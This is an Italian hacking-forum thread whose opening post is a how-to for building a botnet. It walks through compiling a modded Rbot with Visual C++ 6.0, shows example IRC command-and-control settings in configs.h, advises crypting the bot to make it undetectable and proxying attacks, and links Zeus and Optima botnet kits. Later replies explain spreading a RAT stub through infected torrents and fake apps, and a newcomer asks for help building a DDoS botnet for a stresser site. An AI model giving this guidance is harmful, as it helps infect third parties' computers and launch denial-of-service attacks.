Guida DoS Come creare una Botnet o DDosNet.

Creare una BotNet



Cosa è una botnet?
Una botnet è una rete di computer collegati ad internet che fanno parte di un insieme di computer controllato da un'unica entità, il botmaster. Ciò può essere causato da falle nella sicurezza o mancanza di attenzione da parte dell'utente e dell'amministratore di sistema, per cui i computer vengono infettati da virus informatici otrojan i quali consentono ai loro creatori di controllare il sistema da remoto. I controllori della botnet possono in questo modo sfruttare i sistemi compromessi per scagliare attacchi distribuiti del tipo denial-of-service (DDoS) contro qualsiasi altro sistema in rete oppure compiere altre operazioni illecite, in taluni casi agendo persino su commissione di organizzazioni criminali. I computer che compongono la botnet sono chiamati bot (da roBOT) o zombie.


Ora vediamo come crearne una:
In primo luogo bisogna scaricare questi tre tool:

1. Download Mcft Visual C++ 6.0 Standard Edition

Microsoft Visual C++ Standard Edition - CNET Download.com

Serial: edit..

2.Aprite il setup e installatelo. Poi inserite il seriale sopra elencato.

3.Scaricare e installate il Service Pack 6 per Visual Basic 6.0 , Visual C++ 6.0 con Visual Source Safe 6.0d:

http://www.microsoft.com/downloads/d...displaylang=en

4.Dopo di che scaricate e installate Windows Platform SDK:

Download: Microsoft Windows 7 SDK - Microsoft Download Center - Download Details

__________________________________________________ _______________________

Preparazione Microsoft Visual C++ 6.0
__________________________________________________ _______________________

Ora aprite Microsoft Visual C++ 6.0 , andate in Tools poi opzioni aprite la scheda Directories e sostituite le precedenti righe con queste sotto elencate nello stesso ordine senno non funziona :


C:\PROGRAMMI\MICROSOFT PLATFORM SDKC:\PROGRAMMI\MICROSOFT PLATFORM SDK\BINC:\PROGRAMMI\MICROSOFT PLATFORM SDK\INCLUDEC:\PROGRAMMI\MICROSOFT PLATFORM SDK\LIB
__________________________________________________ _________________________

Scaricate la versione moddata di Rbot 7.6 a edit

__________________________________________________ _________________________


Vai alla directory del file precedentemente scaricato, aprite il file configs.h con il blocco note (o qualsiasi altro programma di editor di testo)

E modificate queste righe:


char password[] = ""; // The password that the bot uses when .login command is enteredchar server[] = ""; // The IRC server you will host your bot(s) on to command itchar serverpass[] = ""; // A password to the IRC server if it is requiredchar channel[] = ""; // Channel in which the bot will join upon entering serverchar chanpass[] = ""; // The password of the channe

Questo e un'esempio



char password[] = "pwnt"; char server[] = "irc.landoleet.org";char serverpass[] = "lalla";char channel[] = "#bhobho"; char chanpass[] = "qual'è??";
__________________________________________________ _________________________

Ora aprite Visual Studio C++ 6.0 poi cliccate su File > Open Workspace . Sfoglia tra le cartelle del rbot e cerca il file "rBot.dsw" , una volta trovato fai doppio click su di esso .

Dopo di che ,clicca col tasto desto del mouse sulla scritta in grassetto (come nell'immagine in baso) e clicca su build:
botnetpic1.jpg


Dopo averlo compilato il progetto andate nella cartella "Debug" e li troverete il rbot.

E altamente consigliato blindare il file per renderlo irrilevabile.
E sconsigliato testare il file su di sè , e se lo aprite per sbaglio andate nella botnet ed lanciate il comando per disinfettare il bot.
Proxatevi Sempre per attaccare.

IN SEGUITO VI LASCIO ALTRE BOTNET: (IN AGGIORNAMENTO)

1-OPTIMA BOTNET
edit
2-ZEUS BOTNET (WORKING)

Se I Link Non vanno è RapidShare che sta avendo Problemi di Hosting riprovate,e dopo Un po andranno.


LINK SISTEMATI!!

Potresti fare una guida su come fare una botnet RAT (per mining)
 
Ma mi hai detto tu che sono diverse quelle standard e RAT :omfg:

E come faccio?

Nell'altro post ti ho spiegato cos'è un R.A.T e cos è una Botnet, e come funzionano
Codice:
[url=http://it.wikipedia.org/wiki/Botnet]Botnet - Wikipedia[/url]
[url=http://en.wikipedia.org/wiki/Remote_administration_software]Remote administration software - Wikipedia, the free encyclopedia[/url]
Ti ho anche spiegato che alcuni rat come il darkcomet supportano la funzione di botnet, in quanto consentono
di effettuare attacchi Ddos, Quindi, Se vuoi fare una Botnet basata su un rat semplicementi spreadi la tua stub.
Spread = Diffondere
Diffusione che può avvenire tramite Torrents infetti, Applicazioni Fake, eccetra.
 
Ultima modifica:
Ciao ragazzi scuasatemi io non ci capisco niente ma vorrei imparare a creare una Bornet chi andrebbe di aiutarmi? O di consigliarmi qualcosa di questo tipo
Messaggio unito automaticamente:

Salve ragazzi volevo chiedervi una aiuto vorrei imparare a creare una Bornet che sia forte che qualcuno che è in grado di aiutarmi... vi riangrazio
 
Ultima modifica:
Salve ragazzi volevo chiedervi una aiuto vorrei imparare a creare una Bornet che sia forte che qualcuno che è in grado di aiutarmi... vi riangrazio

Premesso che hai risposto ad una discussione congelata da ben 4 anni, quindi classificabile come spam, oltre a non esserti presentato e al mancato utilizzo di un italiano quantomeno decente...

Non credo di capire.
Per tua stessa ammissione non ci capisci nulla, ma vuoi creare una botnet? (Si, bornet non vuol dire nulla)
Sai esattamente cos'è una botnet e a cosa serve?
E per quale motivo vorresti una botnet?
 
Ciao Gianluca si hai pienamente ragione, in effetti non ci capisco molto in passato comprai delle api e le collegai nel mio sito stressante ma vpn ovh non riusciva ad abbatterle e in giro nei forum sentì parlare di botnet che è molto forte ma mi dissero di trovare exploit stabile e ho detto ora provo a dare un occhiata vedo se qualcuno mi aiuta io non devo fare niente di che uso per il gioco è per imparare. Comunque scusami per il linguaggio